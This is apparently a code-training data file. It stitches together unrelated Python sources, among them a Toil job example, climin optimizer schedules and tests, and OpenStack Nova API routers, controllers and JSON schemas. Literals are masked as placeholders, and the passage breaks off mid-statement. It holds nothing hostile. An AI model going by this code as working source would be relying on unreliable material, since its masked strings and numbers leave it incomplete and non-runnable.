        Job.__init__(self, memory=<NUM_LIT>, cores=<NUM_LIT:2>, disk='<STR_LIT>')

    def run(self, fileStore):
        # The child's return value (a file ID promise) is handed to the
        # follow-on before it is resolved.
        fileID = self.addChildJobFn(childFn, cores=<NUM_LIT:1>, memory='<STR_LIT>', disk='<STR_LIT>').rv()
        self.addFollowOn(FollowOn(fileID))


def childFn(job):
    # Write a payload to the global file store and return its file ID.
    with job.fileStore.writeGlobalFileStream() as (fH, fileID):
        fH.write("<STR_LIT>")
        return fileID


class FollowOn(Job):
    def __init__(self, fileId):
        Job.__init__(self)
        # fileId: global-file-store ID produced by childFn.
        self.fileId = fileId

    def run(self, fileStore):
        # Copy the global file into a job-local temporary file.
        tempDir = fileStore.getLocalTempDir()
        tempFilePath = "<STR_LIT:/>".join([tempDir, '<STR_LIT>'])
        with fileStore.readGlobalFileStream(self.fileId) as globalFile:
            with open(tempFilePath, "<STR_LIT:w>") as localFile:
                localFile.write(globalFile.read())
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import math <EOL> import numpy as np <EOL> def decaying ( start , decay ) : <EOL> """<STR_LIT>""" <EOL> return ( start * decay ** i for i in itertools . count ( <NUM_LIT:0> ) ) <EOL> def linear_annealing ( start , stop , n_steps ) : <EOL> """<STR_LIT>""" <EOL> start , stop = float ( start ) , float ( stop ) <EOL> inc = ( stop - start ) / n_steps <EOL> for i in range ( n_steps ) : <EOL> yield start + i * inc <EOL> while True : <EOL> yield stop <EOL> def repeater ( iter , n ) : <EOL> """<STR_LIT>""" <EOL> for i in iter : <EOL> for j in range ( n ) : <EOL> yield i <EOL> class SutskeverBlend ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , max_momentum , stretch = <NUM_LIT> ) : <EOL> self . max_momentum = max_momentum <EOL> self . stretch = stretch <EOL> def __iter__ ( self ) : <EOL> for i in itertools . count ( <NUM_LIT:1> ) : <EOL> m = <NUM_LIT:1> - ( <NUM_LIT:2> ** ( - <NUM_LIT:1> - math . log ( np . floor_divide ( i , self . stretch ) + <NUM_LIT:1> , <NUM_LIT:2> ) ) ) <EOL> yield min ( m , self . max_momentum ) </s>
<s> from __future__ import absolute_import <EOL> import nose <EOL> import itertools <EOL> from climin import Sbfgs <EOL> from . losses import Quadratic , LogisticRegression , Rosenbrock <EOL> @ nose . tools . nottest <EOL> def test_sbfgs_quadratic ( ) : <EOL> obj = Quadratic ( ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:50> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' <EOL> def test_sbfgs_rosen ( ) : <EOL> obj = Rosenbrock ( ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:20> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' <EOL> @ nose . tools . nottest <EOL> def test_sbfgs_lr ( ) : <EOL> obj = LogisticRegression ( ) <EOL> args = itertools . repeat ( ( ( obj . X , obj . Z ) , { } ) ) <EOL> opt = Sbfgs ( obj . pars , obj . f , obj . fprime , args = args ) <EOL> for i , info in enumerate ( opt ) : <EOL> if i > <NUM_LIT:50> : <EOL> break <EOL> assert obj . solved ( ) , '<STR_LIT>' </s>
"""<STR_LIT>"""

from oslo_config import cfg
from oslo_log import log as logging

import nova.api.openstack
from nova.api.openstack.compute import extension_info
from nova.api.openstack.compute.legacy_v2 import consoles as v2_consoles
from nova.api.openstack.compute.legacy_v2 import extensions as v2_extensions
from nova.api.openstack.compute.legacy_v2 import flavors as v2_flavors
from nova.api.openstack.compute.legacy_v2 import image_metadata as v2_image_metadata
from nova.api.openstack.compute.legacy_v2 import images as v2_images
from nova.api.openstack.compute.legacy_v2 import ips as v2_ips
from nova.api.openstack.compute.legacy_v2 import limits as v2_limits
from nova.api.openstack.compute.legacy_v2 import server_metadata as v2_server_metadata
from nova.api.openstack.compute.legacy_v2 import servers as v2_servers
from nova.api.openstack.compute.legacy_v2 import versions as legacy_v2_versions
from nova.i18n import _LW

# Config option controlling snapshot availability (registered globally).
allow_instance_snapshots_opt = cfg.BoolOpt('<STR_LIT>',
                                           default=True,
                                           help='<STR_LIT>')

CONF = cfg.CONF
CONF.register_opt(allow_instance_snapshots_opt)

LOG = logging.getLogger(__name__)


class APIRouter(nova.api.openstack.APIRouter):
    """<STR_LIT>"""
    ExtensionManager = v2_extensions.ExtensionManager

    def __init__(self, ext_mgr=None, init_only=None):
        # This whole router is deprecated; warn loudly on construction.
        LOG.warning(_LW(
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>"))
        super(APIRouter, self).__init__(ext_mgr=ext_mgr,
                                        init_only=init_only)

    def _setup_routes(self, mapper, ext_mgr, init_only):
        # Wire up each legacy-v2 resource; ``init_only`` (when given)
        # restricts which resource groups are registered.

        # Version discovery document at the API root.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = legacy_v2_versions.create_resource()
            mapper.connect("<STR_LIT>", "<STR_LIT:/>",
                           controller=self.resources['<STR_LIT>'],
                           action='<STR_LIT>',
                           conditions={"<STR_LIT>": ['<STR_LIT:GET>']})
            mapper.redirect("<STR_LIT>", "<STR_LIT:/>")

        # Consoles are nested under a parent (server) resource.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_consoles.create_resource()
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=self.resources['<STR_LIT>'],
                            parent_resource=dict(member_name='<STR_LIT>',
                                                 collection_name='<STR_LIT>'))

        # Servers: registered when any of three related groups is requested.
        if init_only is None or '<STR_LIT>' in init_only or '<STR_LIT>' in init_only or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_servers.create_resource(ext_mgr)
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=self.resources['<STR_LIT>'],
                            collection={'<STR_LIT>': '<STR_LIT:GET>'},
                            member={'<STR_LIT:action>': '<STR_LIT:POST>'})

        # Per-server IP addresses (nested resource).
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_ips.create_resource()
            mapper.resource("<STR_LIT>", "<STR_LIT>", controller=self.resources['<STR_LIT>'],
                            parent_resource=dict(member_name='<STR_LIT>',
                                                 collection_name='<STR_LIT>'))

        # Images.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_images.create_resource()
            mapper.resource("<STR_LIT:image>", "<STR_LIT>",
                            controller=self.resources['<STR_LIT>'],
                            collection={'<STR_LIT>': '<STR_LIT:GET>'})

        # Rate/absolute limits.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_limits.create_resource()
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=self.resources['<STR_LIT>'])

        # Flavors.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_flavors.create_resource()
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=self.resources['<STR_LIT>'],
                            collection={'<STR_LIT>': '<STR_LIT:GET>'},
                            member={'<STR_LIT:action>': '<STR_LIT:POST>'})

        # Image metadata: nested resource plus an extra non-RESTful route.
        if init_only is None or '<STR_LIT>' in init_only:
            v2immeta = v2_image_metadata
            self.resources['<STR_LIT>'] = v2immeta.create_resource()
            image_metadata_controller = self.resources['<STR_LIT>']
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=image_metadata_controller,
                            parent_resource=dict(member_name='<STR_LIT:image>',
                                                 collection_name='<STR_LIT>'))
            mapper.connect("<STR_LIT>",
                           "<STR_LIT>",
                           controller=image_metadata_controller,
                           action='<STR_LIT>',
                           conditions={"<STR_LIT>": ['<STR_LIT>']})

        # Server metadata: nested resource plus an extra non-RESTful route.
        if init_only is None or '<STR_LIT>' in init_only:
            self.resources['<STR_LIT>'] = v2_server_metadata.create_resource()
            server_metadata_controller = self.resources['<STR_LIT>']
            mapper.resource("<STR_LIT>", "<STR_LIT>",
                            controller=server_metadata_controller,
                            parent_resource=dict(member_name='<STR_LIT>',
                                                 collection_name='<STR_LIT>'))
            mapper.connect("<STR_LIT>",
                           "<STR_LIT>",
                           controller=server_metadata_controller,
                           action='<STR_LIT>',
                           conditions={"<STR_LIT>": ['<STR_LIT>']})


class APIRouterV21(nova.api.openstack.APIRouterV21):
    """<STR_LIT>"""

    def __init__(self, init_only=None):
        # Collects metadata about every loaded v2.1 extension.
        self._loaded_extension_info = extension_info.LoadedExtensionInfo()
        super(APIRouterV21, self).__init__(init_only)

    def _register_extension(self, ext):
        return self.loaded_extension_info.register_extension(ext.obj)

    @property
    def loaded_extension_info(self):
        return self._loaded_extension_info
"""<STR_LIT>"""

import webob

from nova.api.openstack import api_version_request
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import flavor_access
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import exception
from nova.i18n import _
from nova import objects

ALIAS = '<STR_LIT>'
# soft_authorize: best-effort (no exception); authorize: hard policy check.
soft_authorize = extensions.os_compute_soft_authorizer(ALIAS)
authorize = extensions.os_compute_authorizer(ALIAS)


def _marshall_flavor_access(flavor):
    # Serialize a flavor's project access list into the API response shape.
    rval = []
    for project_id in flavor.projects:
        rval.append({'<STR_LIT>': flavor.flavorid,
                     '<STR_LIT>': project_id})
    return {'<STR_LIT>': rval}


class FlavorAccessController(wsgi.Controller):
    """<STR_LIT>"""

    def __init__(self):
        super(FlavorAccessController, self).__init__()

    @extensions.expected_errors(<NUM_LIT>)
    def index(self, req, flavor_id):
        # List the tenants that may use this (private) flavor.
        context = req.environ['<STR_LIT>']
        authorize(context)
        flavor = common.get_flavor(context, flavor_id)
        # Public flavors have no access list; report not-found.
        if flavor.is_public:
            explanation = _("<STR_LIT>")
            raise webob.exc.HTTPNotFound(explanation=explanation)
        return _marshall_flavor_access(flavor)


class FlavorActionController(wsgi.Controller):
    """<STR_LIT>"""

    def _extend_flavor(self, flavor_rval, flavor_ref):
        # Inject the access attribute into an existing flavor dict.
        key = "<STR_LIT>" % (FlavorAccess.alias)
        flavor_rval[key] = flavor_ref['<STR_LIT>']

    @wsgi.extends
    def show(self, req, resp_obj, id):
        # Extend GET /flavors/{id} responses when policy allows.
        context = req.environ['<STR_LIT>']
        if soft_authorize(context):
            db_flavor = req.get_db_flavor(id)
            self._extend_flavor(resp_obj.obj['<STR_LIT>'], db_flavor)

    @wsgi.extends
    def detail(self, req, resp_obj):
        # Extend every flavor in a detail listing.
        context = req.environ['<STR_LIT>']
        if soft_authorize(context):
            flavors = list(resp_obj.obj['<STR_LIT>'])
            for flavor_rval in flavors:
                db_flavor = req.get_db_flavor(flavor_rval['<STR_LIT:id>'])
                self._extend_flavor(flavor_rval, db_flavor)

    @wsgi.extends(action='<STR_LIT>')
    def create(self, req, body, resp_obj):
        # Extend the response of flavor creation.
        context = req.environ['<STR_LIT>']
        if soft_authorize(context):
            db_flavor = req.get_db_flavor(resp_obj.obj['<STR_LIT>']['<STR_LIT:id>'])
            self._extend_flavor(resp_obj.obj['<STR_LIT>'], db_flavor)

    @extensions.expected_errors((<NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>))
    @wsgi.action("<STR_LIT>")
    @validation.schema(flavor_access.add_tenant_access)
    def _add_tenant_access(self, req, id, body):
        # Grant a tenant access to a private flavor.
        context = req.environ['<STR_LIT>']
        authorize(context, action="<STR_LIT>")
        vals = body['<STR_LIT>']
        tenant = vals['<STR_LIT>']
        flavor = common.get_flavor(context, id)
        try:
            # Newer microversions reject adding access to a public flavor.
            if api_version_request.is_supported(req, min_version='<STR_LIT>'):
                if flavor.is_public:
                    exp = _("<STR_LIT>")
                    raise webob.exc.HTTPConflict(explanation=exp)
            flavor.add_access(tenant)
        except exception.FlavorNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.FlavorAccessExists as err:
            raise webob.exc.HTTPConflict(explanation=err.format_message())
        except exception.AdminRequired as e:
            raise webob.exc.HTTPForbidden(explanation=e.format_message())
        return _marshall_flavor_access(flavor)

    @extensions.expected_errors((<NUM_LIT>, <NUM_LIT>, <NUM_LIT>))
    @wsgi.action("<STR_LIT>")
    @validation.schema(flavor_access.remove_tenant_access)
    def _remove_tenant_access(self, req, id, body):
        # Revoke a tenant's access to a flavor.
        context = req.environ['<STR_LIT>']
        authorize(context, action="<STR_LIT>")
        vals = body['<STR_LIT>']
        tenant = vals['<STR_LIT>']
        flavor = objects.Flavor(context=context, flavorid=id)
        try:
            flavor.remove_access(tenant)
        except (exception.FlavorAccessNotFound,
                exception.FlavorNotFound) as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.AdminRequired as e:
            raise webob.exc.HTTPForbidden(explanation=e.format_message())
        return _marshall_flavor_access(flavor)


class FlavorAccess(extensions.V21APIExtensionBase):
    """<STR_LIT>"""

    name = "<STR_LIT>"
    alias = ALIAS
    version = <NUM_LIT:1>

    def get_resources(self):
        # Nested resource under /flavors/{flavor_id}.
        res = extensions.ResourceExtension(
            ALIAS,
            controller=FlavorAccessController(),
            parent=dict(member_name='<STR_LIT>', collection_name='<STR_LIT>'))
        return [res]

    def get_controller_extensions(self):
        extension = extensions.ControllerExtension(
            self, '<STR_LIT>', FlavorActionController())
        return [extension]
from nova.api.openstack import extensions


# Pure metadata extension descriptor: advertises the bare-metal extended
# status extension; no controllers or resources are added here.
class Baremetal_ext_status(extensions.ExtensionDescriptor):
    """<STR_LIT>"""

    name = "<STR_LIT>"
    alias = "<STR_LIT>"
    namespace = ("<STR_LIT>"
                 "<STR_LIT>")
    updated = "<STR_LIT>"
"""<STR_LIT>"""

from nova.api.openstack import extensions
from nova.api.openstack import wsgi

# Best-effort policy check: False simply skips the response extension.
authorize = extensions.soft_extension_authorizer('<STR_LIT>', '<STR_LIT>')


class ExtendedStatusController(wsgi.Controller):
    def __init__(self, *args, **kwargs):
        super(ExtendedStatusController, self).__init__(*args, **kwargs)

    def _extend_server(self, server, instance):
        # Copy three instance state fields into the server response under
        # namespaced keys built from the extension alias.
        for state in ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']:
            key = "<STR_LIT>" % (Extended_status.alias, state)
            server[key] = instance[state]

    @wsgi.extends
    def show(self, req, resp_obj, id):
        # Extend a single-server GET response when policy allows.
        context = req.environ['<STR_LIT>']
        if authorize(context):
            server = resp_obj.obj['<STR_LIT>']
            db_instance = req.get_db_instance(server['<STR_LIT:id>'])
            self._extend_server(server, db_instance)

    @wsgi.extends
    def detail(self, req, resp_obj):
        # Extend every server in a detail listing.
        context = req.environ['<STR_LIT>']
        if authorize(context):
            servers = list(resp_obj.obj['<STR_LIT>'])
            for server in servers:
                db_instance = req.get_db_instance(server['<STR_LIT:id>'])
                self._extend_server(server, db_instance)


class Extended_status(extensions.ExtensionDescriptor):
    """<STR_LIT>"""

    name = "<STR_LIT>"
    alias = "<STR_LIT>"
    namespace = ("<STR_LIT>"
                 "<STR_LIT>")
    updated = "<STR_LIT>"

    def get_controller_extensions(self):
        controller = ExtendedStatusController()
        extension = extensions.ControllerExtension(self, '<STR_LIT>', controller)
        return [extension]
<s> import netaddr <EOL> import webob <EOL> from webob import exc <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> from nova import context as nova_context <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova import network <EOL> from nova . objects import base as base_obj <EOL> from nova . objects import fields as obj_fields <EOL> authorize = extensions . extension_authorizer ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> authorize_view = extensions . extension_authorizer ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> extended_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def network_dict ( context , network , extended ) : <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' ) <EOL> admin_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:host>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> if network : <EOL> if context . is_admin : <EOL> fields += admin_fields <EOL> if extended : <EOL> fields += extended_fields <EOL> is_obj = isinstance ( network , base_obj . NovaObject ) <EOL> result = { } <EOL> for field in fields : <EOL> if is_obj and isinstance ( network . fields [ field ] . AUTO_TYPE , <EOL> obj_fields . IPAddress ) : <EOL> val = network . get ( field , None ) <EOL> if val is not None : <EOL> result [ field ] = str ( val ) <EOL> else : <EOL> result [ field ] = val <EOL> else : <EOL> result [ field ] = network . get ( field , None ) <EOL> uuid = network . get ( '<STR_LIT>' ) <EOL> if uuid : <EOL> result [ '<STR_LIT:id>' ] = uuid <EOL> return result <EOL> else : <EOL> return { } <EOL> class NetworkController ( wsgi . 
Controller ) : <EOL> def __init__ ( self , network_api = None , ext_mgr = None ) : <EOL> self . network_api = network_api or network . API ( ) <EOL> if ext_mgr : <EOL> self . extended = ext_mgr . is_loaded ( '<STR_LIT>' ) <EOL> else : <EOL> self . extended = False <EOL> def index ( self , req ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize_view ( context ) <EOL> networks = self . network_api . get_all ( context ) <EOL> result = [ network_dict ( context , net_ref , self . extended ) <EOL> for net_ref in networks ] <EOL> return { '<STR_LIT>' : result } <EOL> @ wsgi . action ( "<STR_LIT>" ) <EOL> def _disassociate_host_and_project ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . require_admin_context ( context ) <EOL> try : <EOL> self . network_api . associate ( context , id , host = None , project = None ) <EOL> except exception . NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except NotImplementedError : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise exc . HTTPNotImplemented ( explanation = msg ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> def show ( self , req , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize_view ( context ) <EOL> try : <EOL> network = self . network_api . get ( context , id ) <EOL> except exception . NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> return { '<STR_LIT>' : network_dict ( context , network , self . extended ) } <EOL> def delete ( self , req , id ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> try : <EOL> self . network_api . delete ( context , id ) <EOL> except exception . NetworkInUse as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . 
NetworkNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> def create ( self , req , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . require_admin_context ( context ) <EOL> def bad ( e ) : <EOL> return exc . HTTPBadRequest ( explanation = e ) <EOL> if not ( body and body . get ( "<STR_LIT>" ) ) : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> params = body [ "<STR_LIT>" ] <EOL> if not params . get ( "<STR_LIT:label>" ) : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> cidr = params . get ( "<STR_LIT>" ) or params . get ( "<STR_LIT>" ) <EOL> if not cidr : <EOL> raise bad ( _ ( "<STR_LIT>" ) ) <EOL> if params . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> params [ "<STR_LIT>" ] = None <EOL> params [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> try : <EOL> params [ "<STR_LIT>" ] = netaddr . IPNetwork ( cidr ) . size <EOL> except netaddr . AddrFormatError : <EOL> msg = _ ( '<STR_LIT>' ) % cidr <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if not self . extended : <EOL> create_params = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for field in extended_fields + create_params : <EOL> if field in params : <EOL> del params [ field ] <EOL> try : <EOL> network = self . network_api . create ( context , ** params ) [ <NUM_LIT:0> ] <EOL> except ( exception . InvalidCidr , <EOL> exception . InvalidIntValue , <EOL> exception . InvalidAddress , <EOL> exception . NetworkNotCreated ) as ex : <EOL> raise exc . HTTPBadRequest ( explanation = ex . format_message ) <EOL> except exception . CidrConflict as ex : <EOL> raise exc . HTTPConflict ( explanation = ex . format_message ( ) ) <EOL> return { "<STR_LIT>" : network_dict ( context , network , self . extended ) } <EOL> def add ( self , req , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context ) <EOL> nova_context . 
require_admin_context ( context ) <EOL> if not body : <EOL> raise exc . HTTPUnprocessableEntity ( ) <EOL> network_id = body . get ( '<STR_LIT:id>' , None ) <EOL> project_id = context . project_id <EOL> try : <EOL> self . network_api . add_network_to_project ( <EOL> context , project_id , network_id ) <EOL> except NotImplementedError : <EOL> msg = ( _ ( "<STR_LIT>" ) ) <EOL> raise exc . HTTPNotImplemented ( explanation = msg ) <EOL> except ( exception . NoMoreNetworks , <EOL> exception . NetworkNotFoundForUUID ) as e : <EOL> raise exc . HTTPBadRequest ( explanation = e . format_message ( ) ) <EOL> return webob . Response ( status_int = <NUM_LIT> ) <EOL> class Os_networks ( extensions . ExtensionDescriptor ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> alias = "<STR_LIT>" <EOL> namespace = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> updated = "<STR_LIT>" <EOL> def get_resources ( self ) : <EOL> member_actions = { '<STR_LIT:action>' : '<STR_LIT:POST>' } <EOL> collection_actions = { '<STR_LIT>' : '<STR_LIT:POST>' } <EOL> res = extensions . ResourceExtension ( <EOL> '<STR_LIT>' , <EOL> NetworkController ( ext_mgr = self . ext_mgr ) , <EOL> member_actions = member_actions , <EOL> collection_actions = collection_actions ) <EOL> return [ res ] </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from nova . api . openstack import extensions as base_extensions <EOL> from nova . i18n import _LW <EOL> STANDARD_EXTENSIONS = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> ext_opts = [ <EOL> cfg . MultiStrOpt ( <EOL> '<STR_LIT>' , <EOL> default = [ STANDARD_EXTENSIONS ] , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> deprecated_for_removal = True ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( ext_opts ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ExtensionManager ( base_extensions . ExtensionManager ) : <EOL> def __init__ ( self ) : <EOL> self . cls_list = CONF . osapi_compute_extension <EOL> if ( len ( self . cls_list ) > <NUM_LIT:0> and <EOL> self . cls_list [ <NUM_LIT:0> ] != STANDARD_EXTENSIONS ) : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . extensions = { } <EOL> self . sorted_ext_list = [ ] <EOL> self . _load_extensions ( ) </s>
<s> create = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:version>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:url>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , <EOL> '<STR_LIT:url>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> update = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:version>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:url>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { 
<EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT:version>' , '<STR_LIT:url>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False , <EOL> } </s>
<s> from nova . api . validation import parameter_types <EOL> associate_host = { <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : parameter_types . hostname <EOL> } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : False <EOL> } </s>
<s> import base64 <EOL> import re <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import oslo_messaging as messaging <EOL> from oslo_utils import strutils <EOL> from oslo_utils import timeutils <EOL> from oslo_utils import uuidutils <EOL> import six <EOL> import stevedore <EOL> import webob <EOL> from webob import exc <EOL> from nova . api . openstack import api_version_request <EOL> from nova . api . openstack import common <EOL> from nova . api . openstack . compute . schemas import servers as schema_servers <EOL> from nova . api . openstack . compute . views import servers as views_servers <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import wsgi <EOL> from nova . api import validation <EOL> from nova import compute <EOL> from nova . compute import flavors <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LW <EOL> from nova . image import glance <EOL> from nova import objects <EOL> from nova import utils <EOL> ALIAS = '<STR_LIT>' <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> authorize = extensions . os_compute_authorizer ( ALIAS ) <EOL> class ServersController ( wsgi . Controller ) : <EOL> """<STR_LIT>""" <EOL> EXTENSION_CREATE_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_REBUILD_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_UPDATE_NAMESPACE = '<STR_LIT>' <EOL> EXTENSION_RESIZE_NAMESPACE = '<STR_LIT>' <EOL> _view_builder_class = views_servers . ViewBuilderV21 <EOL> schema_server_create = schema_servers . base_create <EOL> schema_server_update = schema_servers . base_update <EOL> schema_server_rebuild = schema_servers . 
